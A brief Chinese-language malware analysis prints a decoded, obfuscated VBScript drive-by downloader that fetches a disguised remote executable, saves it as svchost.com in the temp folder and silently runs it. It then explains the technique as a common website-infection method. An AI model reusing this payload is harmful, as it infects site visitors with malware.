变量Words的值用escape()编码了
用unescape()解码后如下:
<script language="VBScript">
on error resume next
z3="ob"
z4="ject"
str6=z3&z4
z1="cla"
z2="ssid"
str7=z1&z2
c0="cl"
c1="sid:BD96C556-"
c2="65A3-11D0-983A-"
c3="00C04FC29E36"
str8=c0&c1&c2&c3
str9=str8
Set dfile = document.createElement(str6)
dfile.setAttribute str7, str9
d1="Micros"
d2="oft."
d3="XMLH"
d4="TTP"
str10=d1&d2&d3&d4
str11=str10
Set http = dfile.Create
Object(str11,"")
a1="Ad"
a2="odb."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set strm = dfile.create
object(str5,"")
strm.type = 1
http.Open "GET", "hxxp://www.uxiu.net/ad/images/1/login.jpg", False
http.Send
set fso = dfile.create
object("Scripting.FileSystem
Object","")
set temp = fso.GetSpecialFolder(2)
filename= fso.BuildPath(temp,"svchost.com")
strm.open
strm.write http.responseBody
strm.savetofile filename,2
strm.close
b1="She"
b2="ll."
b3="Applic"
b4="ation"
str2=b1&b2&b3&b4
str3=str2
set exc = dfile.create
object(str3,"")
str4="open"
exc.ShellExecute filename,"","",str4,0
</script>
其功能为利用 Microsoft.XMLHTTP 和 Scripting.FileSystem
Object 下载文件会下载 hxxp://www.uxiu.net/ad/images/1/login.jpg,保存为 %temp%svchost.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
这是近期使用得最多的一种网站挂马的方法